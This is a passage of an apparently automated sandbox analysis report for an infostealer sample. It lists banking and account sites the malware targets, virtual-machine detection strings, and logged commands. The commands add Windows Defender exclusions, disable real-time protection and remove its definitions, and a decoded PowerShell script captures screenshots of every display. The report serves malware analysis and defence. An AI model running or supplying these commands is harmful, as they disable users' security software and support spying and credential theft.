              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696497155x
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: qemu-ga
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmware
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmusrvc
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"m
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696497155f
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696497155s
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareservice
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696497155j
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwareuser
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696497155o
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmwaretray
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765770176.00000161971E8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1766840193.0000016197572000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1457822695.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1439779378.000001619710E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1431426826.00000161971E8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: rar.exe, 00000048.00000002.1644927829.000001F5A5EEA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\6
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vboxtray
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\Linkageroute
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5673000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWRoot%\system32\dr+
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: getmac.exe, 0000002B.00000003.1439440681.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5664000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1439025716.000001ABF5695000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000002.1440054173.000001ABF5697000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000002B.00000003.1438552704.000001ABF568F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: vmtoolsd
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696497155t
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000003.1757952150.000001619718F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B110B1B8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B11140D0 GetProcessHeap,0_2_00007FF7B11140D0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B110B1B8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B110B1B8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FBE20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7B10FBE20
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FC6AC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7B10FC6AC
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 0_2_00007FF7B10FC88C SetUnhandledExceptionFilter,0_2_00007FF7B10FC88C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E751B970 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E751B970
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeCode function: 2_2_00007FF8E7553BB0 IsProcessorFeaturePresent,00007FF8F9D619C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8F9D619C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF8E7553BB0
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D314C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_00007FF71D314C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,72_2_00007FF71D30A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30B6D8 SetUnhandledExceptionFilter,72_2_00007FF71D30B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exeCode function: 72_2_00007FF71D30B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,72_2_00007FF71D30B52C

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
